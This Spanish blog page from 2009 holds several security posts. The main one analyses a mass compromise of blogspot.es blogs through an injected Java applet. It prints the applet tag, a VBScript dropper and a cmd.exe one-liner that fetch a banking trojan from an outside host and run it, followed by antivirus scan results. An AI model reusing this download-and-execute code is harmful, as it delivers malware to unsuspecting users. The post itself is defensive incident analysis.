Un lugar sin fin

PenTester Scripting

Escrito por unlugarsinfin 18-11-2009 en General. Comentarios (0)

Brujuleando por la web encontré http://pentesterscripting.com/, una web en el que un grupo de Pentesters e investigadores publica una serie de scripts destinados ha facilitarnos la vida en nuestros tests de intrusión.

 

Aunque ya existen algunos scripts y muy útiles, la página ha nacido hace relativamente poco, por lo que seguramente habrá que estar atentos a las nuevas publicaciones.

 

http://unlugarsinfin.blogspot.es/img/pentesterscripting.jpg

 

Microsoft TechNet: Tour de la innovación, (Valladolid) Lanzamiento Windows 7, Windows

Escrito por unlugarsinfin 30-10-2009 en General. Comentarios (0)

Ayer tuvo lugar el Innovation Tour por parte del equipo del TechNet de Microsoft en el Parque Tecnológico de Boecillo (Valladolid) al cuál no me pude resistir y no falte.

Como invitados al evento estuvieron Fernando Guillot y Paulo Días los dos IT Pro Evangelists de Microsoft, Miguel Hernández MVP Small Business Server y como no podía faltar en este tipo de eventos la presencia de Chema Alonso MVP Windows Sever Security de Informática64.

Aquí va la Agenda del Evento:

10:00 – 10:20 –Keynote :   “Innovación en tiempo de crisis”
    

Presentación de toda la gama de nuevos productos de infraestructura con los que suempresa ahorrará costes y será más eficiente

10:30 – 11:15 – Sesión  Windows 7:  
    

Primera toma de contacto con Windows 7, información acerca de las distintas versiones de Windows 7 y nuevas características del sistema operativo, demostraciones de la  experiencia de usuario (nueva interface touch, jumplists, Internet Explorer 8),  mostraremos la utilidad  de Problem  Steps Recorder y como  se ahorrar tiempo y dinero  en las empresas con el helpdesk. Compatibilidad de drivers, aplicaciones.  Mostraremos Windows XP Mode como mecanismo de compatibilidad y el soporte nativo al formato VHD.

11:15 – 12:00 – Windows 7 y windows Server 2008 R2 Better Together:  

    

En esta sesión vamos a hablar de las opciones de acceso remoto que proporciona la nueva plataforma, empezando en la situación típica actual con VPNs PPTP, pasando por las conexiones SSTP, la solución para SSTP que representa el paso siguiente - VPN Reconnect y de Direct Access.  Posibles mejoras en las empresas que tienen pequeñas (o incluso medianas) delegaciones remotas soluciones para estos escenarios BranchCache y como les puede ayudar a mantener un buen equilibrio entre lo que se gastan en las conexiones de estas delegaciones y la experiencia de usuario que obtienen.

 

 12:00 – 12:30 – Café

 

12:30 – 13:30 –  Novedades en Virtualización con Windows Server 2008 R2 y System Center: 

    

Esta sesión mostraremos las novedades en Hyper-V R2, con demostraciones prácticas de: Live Migration y CSVs Hyper-V Server 2008 R2, también se tratara la Virtualización del Escritorio con las siguientes demostraciones: Portal de Autoservicio con acceso a Remote Apps y Pools de VMs (con App-V) Feed del portal en Windows 7, Gestión de entornos virtualizados y heterogéneos.  Para finalizar esta sesión hablaremos de las Novedades de SCVMM2008R2,  demostraciones Integración con SCOM y soporte a Linux/Unix

 

13:30 – 14:30 – Novedades de Exchange 2010:

    

En esta sesión veremos: Principales novedades en Exchange Server 2010, Descripción de los servicios Online de Exchange de Microsoft,  Buzones y grupos moderados,  Cumplimiento legal con Políticas de archivado y RMS, novedades en Outlook Web Access,   Integración con

Mensajería instantánea,  alta disponibilidad con Database Availability Groups

Seguridad perimetral e integración con FSE y TMG, escenarios de migración y

Actualización, monitorización con System Center Operations manager 2007 R2

 

14:30 – 15:30  – Cocktail

 

15:30 – 17:00 – Novedades de Seguridad en las plataformas Windows y Forefront:

    

Mecanismos de seguridad que incluyen las nuevas plataformas, tanto  de cliente como de servidor, además de la propuesta de Stirling y Forefront Client Security como plataforma de seguridad integrada. Bitlocker, la herramienta de recuperación Diagnostics and Recovery Toolset (DaRT) de MDOP, y luego UAC y Applocker, seguimos con una parte de seguridad en Internet Explorer 8, demostración  comparativas con Firefox, SSL Inspection de TMG, Homegroups y el Firewall de Windows 7 Windows Security Essentials) y de Forefront Client Security + Stirling.

 

Aquí os dejo unas fotos con los verdaderos protagonistas del evento:

 

http://unlugarsinfin.blogspot.es/img/mstour02.jpg 

 

Arriba Paulo Días, Fernando Guillot y Miguel Hernández y abajo Chema Alonso

 

http://unlugarsinfin.blogspot.es/img/mstour01.jpg 

 

Clasificación de especies

Escrito por unlugarsinfin 25-10-2009 en General. Comentarios (0)

Cracker
Proviene del termino "Criminal hacker", es aquel que viola la seguridad de un sistema informático, con la diferencia de que lo hace con fines de beneficio personal. También es así llamado a quien diseña cracks informáticos para  modificar el comportamiento del software o hardware original sin que pueda ser dañino para el usuario del mismo

 

Hacker
Son aquellas personas que poseen un amplio conocimiento de alguna de las ramas de la informática. Según sus acciones pueden clasificarse en White Hats, acciones buenas como descubrir los agujeros de seguridad de  un programa y notificarlos a la comunidad informática) o Black Hats, descubren los fallos de un programa y lo usan en beneficio propio

 

Lamer
Proviene del ingles "incompetente", "falto de inteligencia", personas con una boca mas grande que sus habilidades. Suelen ser personas que alardean de ser hackers cuando en realidad utilizan programas de fácil manejo creado por los auténticos hackers sin obtener los resultados que ellos pretendían.

 

Script kiddie
Es aquella persona que presume de hacker o cracker cuando en realidad no posee un grado de conocimientos suficientes. Se podría decir que es la siguiente fase del lamer.

 

Phreaker
Es una persona que mediante el uso de la tecnología es capaz de interferir en los sistemas telefónicos de forma ilegal

 

Geek
Es una persona que comparte una fascinación obsesiva por la tecnología y la imaginación. Se trata de una persona extravagante y extrovertida, tanto en el estilo de vida como en la forma de ser, que hace las cosas por el reconocimiento y la diversión.

 

Nerd
Es una persona con gran inteligencia y pasión con el conocimiento que tiende a apartarse de la corriente social. Menos extravagante que un Geek

 

Spammer
Persona que roba o compra direcciones de correo electrónico sustraídas y remite e-mails no solicitados

 

Gurus
Son los expertos en algun área, entiendase por experto conocer "TODO". Se suelen encargar de formar a futuros hackers

 

CopyHackers
Falsificadores que comercializan todo lo copiado

 

Bucaneros
Personas con escaso conocimiento informatico que se dedican a la venta de productos comprados a los copyhackers

 

Newbie
Son los novatos del hackero

 

Wannaber
Newbie que desea ser hacker pero estos consideran que su coeficiente no da para tal fin (Wannaber= wanna be =quiero ser)

 

Samurai
Son los llamados "hackers a sueldo" trabajan solos y saben que todo puede ser tumbado si se tiene dinero suficiente para pagarlo

 

Creadores de virus
Aqui se ha de diferenciar entre el programador del virus y el propagador, sienten un gran placer al ver que su "software" ha sido ampliamente "adquirido" por el publico

 

Explo1ter
Son personas que aprovechan un error en la programación de un programa para obtener diversos privilegios sobre el software

 

Fuente: Wikipedia

 

¡Comprometidos los blogs de blogspot.es!

Escrito por unlugarsinfin 20-10-2009 en General. Comentarios (0)

Ahora que los chicos de blogspot.es han solucionado el problema (durante la tarde del Lunes 19 de Octubre), puedo comentar esta noticia.

 

El pasado viernes 16 de octubre por la mañana, me encontré con una sorpresa al acceder a este mismo blog que estáis leyendo, a nuestro queridísimo blog http://unlugarsinfin.blogspot.es.

 

De repente, un mensaje me solicitaba confiar en la ejecución de un applet firmado por www.eternalcog.org. Evidentemente, no se trataba de ninguna funcionalidad nueva de nuestro servidor de hosting gratuito, pues el firmante se trataba, nada más y nada menos, de la Eterna Iglesia de Dios (toma ya, con la Iglesia hemos topado).

 

http://unlugarsinfin.blogspot.es/img/blogspotes_infeccion0.jpg 

 

Viendo el código fuente de la página, en seguida te percatabas de lo ocurrido...

 

En el apartado ‘Acerca de’ presente en la columna de la izquierda de nuestro blog, presente en todas las plantillas de blogspot.es y por tanto presente en todos los blogs de blogspot.es, nos encontramos con el siguiente código:

 

<div id="leftbar">

 

<div id="acerca">

<h3 class="acerca">

Un lugar sin fin

<applet height="1" width="1" archive="http://www.eternalcog.org/wtc/halloween07/flash.jar" code="FlashPlayer.class"/>

 

¡Se trataba pues de una infección mediante Java Applet (y VBScript) que afectaba a todos los blogs de blogspot.es!.

 

Para corroborarlo (bueno sí, y por curiosidad), decidí ahondar más en la infección.

 

Normalmente, en este tipo de infecciones, mediante la ejecución de un Applet en Java y un script en VBScript o Batch, es posible descargar y ejecutar un programa remoto en un pc tan sólo con un click. Basta decir que se confía en el applet que se intenta ejecutar.

 

Pues bien, en un entorno mega-virtual (sandbox) para pruebas y demás (tengo que quedar bien, claro ;-)) aceptamos confiar en el applet y observamos los resultados.

 

La primera impresión fue la siguiente:

 

http://unlugarsinfin.blogspot.es/img/blogspotes_infeccion1.jpg 

 

Efectivamente, el applet creaba un VBScript en la ruta de instalación de mi Firefox con el siguiente contenido:

 

Const adTypeBinary = 1 

Const adSaveCreateOverWrite = 2 

Dim BinaryStream 

Dim BinaryStream 

Set BinaryStream = CreateObject("ADODB.Stream") 

Dim BinaryStream 

Dim BinaryStream 

BinaryStream.Type = adTypeBinary 

Set BinaryStream = CreateObject("ADODB.Stream") 

BinaryStream.Open 

BinaryStream.Open 

BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) 

BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) 

BinaryStream.Open 

BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite 

Function BinaryGetURL(URL) 

Dim Http 

Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") 

Http.Open "GET", URL, False 

Http.Send 

BinaryGetURL = Http.ResponseBody 

End Function 

Set shell = CreateObject("WScript.Shell") 

shell.Run "xxx.exe"

 

y, a través del mismo, intentaba descargar y ejecutar el siguiente fichero http://www.discounttart.co.uk/newsletter/adobe.jpg renombrado a ‘xxx.exe’.

 

 

Veámoslo más en detalle a través de los comandos y procesos que lanzaba el applet:

 

http://unlugarsinfin.blogspot.es/img/blogspotes_infeccion2.jpg 

 

Y a continuación, vemos las propiedades de uno de ellos:

 

http://unlugarsinfin.blogspot.es/img/blogspotes_infeccion3.jpg 

 

Lo tenemos. El comando que ejecutaba el applet es el siguiente:

 

cmd.exe /c echo Const adTypeBinary = 1 > poq.vbs & echo Const adSaveCreateOverWrite = 2 >> poq.vbs & echo Dim BinaryStream >> poq.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> poq.vbs & echo BinaryStream.Type = adTypeBinary >> poq.vbs & echo BinaryStream.Open >> poq.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> poq.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> poq.vbs & echo Function BinaryGetURL(URL) >> poq.vbs & echo Dim Http >> poq.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> poq.vbs & echo Http.Open "GET", URL, False >> poq.vbs & echo Http.Send >> poq.vbs & echo BinaryGetURL = Http.ResponseBody >> poq.vbs & echo End Function >> poq.vbs & echo Set shell = CreateObject("WScript.Shell") >> poq.vbs & echo shell.Run "xxx.exe" >> poq.vbs & start poq.vbs http://www.discounttart.co.uk/newsletter/adobe.jpg xxx.exe

 

A estas alturas, ya sabemos de que se trataba la infección: llamaba y ejecutaba un applet desde una web externa (al parecer también comprometida) y se descargaba y ejecutaba un fichero de otra:

 

http://unlugarsinfin.blogspot.es/img/blogspotes_infeccion4.jpg 

 

Pero ¿qué hace ese fichero adobe.jpg? ¿Qué tipo de malware conlleva?

 

Subimos el fichero adobe.jpg a Virustotal y salimos de dudas: se trata de un troyano que intenta robar información relacionada con las transacciones comerciales y bancarias del usuario infectado, el Trojan-Spy.Win32.Banker, que además y como podemos ver abajo, tiene un bajo índice de detecciones por la mayoría de motores de antivirus.

 

En resumen, hemos sido principales testigos de una infección que ha podido afectar y comprometer a miles de usuarios. Por mi parte, intenté avisar a los administradores de blogspot.es y, si bien han solucionado el problema, todavía no he recibido contestación alguna (ni creo que la reciba, con todo el lío que han tenido que tener).

 

Daré más datos siempre que reciba más información y la seguridad y ética me lo permitan ;-)

 

Análisis del archivo adobe.jpg recibido el 2009.10.19 15:08:42 (UTC)

Resultado: 7/40 (17.5%)

Motor antivirus

Versión

Última actualización

Resultado

a-squared

4.5.0.41

2009.10.19

Trojan-Spy.Win32.Banker.ARQ!IK

AhnLab-V3

5.0.0.2

2009.10.19

-

AntiVir

7.9.1.35

2009.10.19

-

Antiy-AVL

2.0.3.7

2009.10.19

-

Authentium

5.1.2.4

2009.10.19

-

Avast

4.8.1351.0

2009.10.18

-

AVG

8.5.0.420

2009.10.19

-

BitDefender

7.2

2009.10.19

Gen:Trojan.Heur.jm0@sTnLSqnib

CAT-QuickHeal

10.00

2009.10.18

-

ClamAV

0.94.1

2009.10.19

-

Comodo

2657

2009.10.19

-

DrWeb

5.0.0.12182

2009.10.19

-

eSafe

7.0.17.0

2009.10.19

-

eTrust-Vet

35.1.7074

2009.10.19

-

F-Prot

4.5.1.85

2009.10.18

-

F-Secure

9.0.15300.0

2009.10.16

Gen:Trojan.Heur.jm0@sTnLSqnib

Fortinet

3.120.0.0

2009.10.19

-

GData

19

2009.10.19

Gen:Trojan.Heur.jm0@sTnLSqnib

Ikarus

T3.1.1.72.0

2009.10.19

Trojan-Spy.Win32.Banker.ARQ

Jiangmin

11.0.800

2009.10.19

-

K7AntiVirus

7.10.874

2009.10.19

-

Kaspersky

7.0.0.125

2009.10.19

-

McAfee

5775

2009.10.18

-

McAfee+Artemis

5775

2009.10.18

-

McAfee-GW-Edition

6.8.5

2009.10.19

-

Microsoft

1.5101

2009.10.19

-

NOD32

4522

2009.10.19

-

Norman

6.03.02

2009.10.19

W32/Obfuscated.H2!genr

nProtect

2009.1.8.0

2009.10.19

-

Panda

10.0.2.2

2009.10.18

Suspicious file

Prevx

3.0

2009.10.19

-

Rising

21.52.04.00

2009.10.19

-

Sophos

4.46.0

2009.10.19

-

Sunbelt

3.2.1858.2

2009.10.18

-

Symantec

1.4.4.12

2009.10.19

-

TheHacker

6.5.0.2.047

2009.10.19

-

TrendMicro

8.950.0.1094

2009.10.19

-

VBA32

3.12.10.11

2009.10.18

-

ViRobot

2009.10.19.1993

2009.10.19

-

VirusBuster

4.6.5.0

2009.10.19

-

 

Información adicional

Tamano archivo: 147456 bytes

MD5...: 3afcb4180f095a4e173c31eae957865e

SHA1..: 501e9c3961f290f35ce67128c2b4e6b6486d3286

SHA256: 50da17057b780bc7b78a5d8588c55412b7ea4323bd5a0b264fb6e5552315ef16

ssdeep: 3072:tjNuE+Yj+LqwWh3aOxyrwG9XhVRG1uWB8xOU75xKsAd:tXOWh3aOxysG9Xh
VRG1uWB8xOU75xK

PEiD..: -

PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x2698
timedatestamp.....: 0x4ada75b2 (Sun Oct 18 01:56:02 2009)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x1e824 0x1f000 5.71 987cd15991770991e1f15e7e73f63c3c
.data 0x20000 0x16e8 0x1000 0.00 620f0b67a91f7f74151bc5be745b7110
.rsrc 0x22000 0x2b5a 0x3000 4.18 2871f25d7b9eff57b91e38761a302c49

( 1 imports )
> MSVBVM60.DLL: __vbaVarTstGt, __vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaPut3, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, -, __vbaFreeObjList, -, -, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, -, -, __vbaStrCat, -, __vbaLsetFixstr, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, -, __vbaExitProc, -, -, __vbaOnError, -, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, -, -, __vbaStrFixstr, -, __vbaFpR8, __vbaBoolVarNull, _CIsin, __vbaErase, -, -, -, -, __vbaChkstk, -, __vbaFileClose, EVENT_SINK_AddRef, -, __vbaGenerateBoundsError, -, __vbaStrCmp, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaRedimPreserve, _adj_fpatan, __vbaFixstrConstruct, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, -, __vbaUI1I2, _CIsqrt, __vbaVarAnd, EVENT_SINK_QueryInterface, __vbaUI1I4, __vbaExceptHandler, -, -, __vbaStrToUnicode, __vbaPrintFile, _adj_fprem, _adj_fdivr_m64, -, -, -, __vbaFPException, __vbaInStrVar, -, __vbaUbound, __vbaStrVarVal, __vbaVarCat, __vbaI2Var, -, -, _CIlog, __vbaErrorOverflow, -, __vbaFileOpen, -, -, __vbaInStr, __vbaNew2, _adj_fdiv_m32i, -, _adj_fdivr_m32i, -, __vbaStrCopy, -, __vbaFreeStrList, -, _adj_fdivr_m32, _adj_fdiv_r, -, __vbaVarTstNe, __vbaI4Var, __vbaVarCmpEq, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, -, __vbaVarCopy, -, _CIatan, -, __vbaCastObj, __vbaAryCopy, __vbaStrMove, _allmul, _CItan, __vbaAryUnlock, __vbaUI1Var, __vbaFPInt, _CIexp, __vbaFreeObj, __vbaFreeStr, -

( 0 exports )

RDS...: NSRL Reference Data Set
-

pdfid.: -

trid..: Win32 Executable Microsoft Visual Basic 6 (86.2%)
Win32 Executable Generic (5.8%)
Win32 Dynamic Link Library (generic) (5.1%)
Generic Win/DOS Executable (1.3%)
DOS Executable Generic (1.3%)

sigcheck:
publisher....: sony
copyright....: n/a
product......: terra
description..: n/a
original name: jh.exe
internal name: jh
file version.: 2.00
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned

Investigando con MIR-ROR

Escrito por unlugarsinfin 17-10-2009 en General. Comentarios (0)

MIR-ROR (Motile Incident Response – Respond Objectively, Remediate) es un script en línea de comandos (.bat) para Windows que llama a herramientas específicas de Sysinternals y otros para proveer una captura de datos para investigaciones.

La versión 1.2 ha sido publicada recientemente (9 de Octubre) y requiere los siguientes pasos para su uso:

1) Descargar la suite de Sysinternals aquí: http://technet.microsoft.com/en-us/sysinternals/bb842062.aspx

2) Desempaquetar la suite

3) Crear el directorio c:\tools\MIR-ROR

4) Copiar las siguientes herramientas a c:\tools\MIR-ROR

autorunsc.exe

handle.exe

Listdlls.exe

logonsessions.exe

now.exe (from Win2k3 ResKit:http://www.microsoft.com/downloads/details.aspx?FamilyID=9d467a69-57ff-4ae7-96ee-b18c4790cffd&displaylang=en)

openports.exe (download here: http://www.diamondcs.com.au/consoletools/openports.php)

psfile.exe

Psinfo.exe

pslist.exe

psloggedon.exe

psloglist.exe

psservice.exe

seccheck.exe (download here: http://holisticinfosec.org/toolsmith/files/seccheck/seccheck.exe)

showacls.exe (from Win2k3 ResKit: http://www.microsoft.com/downloads/details.aspx?FamilyID=9d467a69-57ff-4ae7-96ee-b18c4790cffd&displaylang=en)

showpriv.exe (from Win2k3 ResKit: http://www.microsoft.com/downloads/details.aspx?FamilyID=9d467a69-57ff-4ae7-96ee-b18c4790cffd&displaylang=en)

sigcheck.exe

srvinfo.exe (from Win2k3 ResKit: http://www.microsoft.com/downloads/details.aspx?FamilyID=9d467a69-57ff-4ae7-96ee-b18c4790cffd&displaylang=en)

Tcpvcon.exe

5) Descargar MIR-ROR desde: http://mirror.codeplex.com/Release/ProjectReleases.aspx?ReleaseId=34221#DownloadId=87048  

6)  Renombrar MIR-ROR.txt a MIR-ROR.cmd y ejecutar especificando los dos parámetros necesarios:

 

You must specify two parameters:

 

The first is the drive letter for the tools directory.

The second is the drive letter of the target folder:

Example: MIR-ROR.cmd E E or MIR-ROR.cmd F G

El nombre de archivo, directorio o etiqueta del volumen no es válido.

C:\tools\MIR-ROR>MIR-ROR.cmd C C

http://unlugarsinfin.blogspot.es/img/mirror1.jpg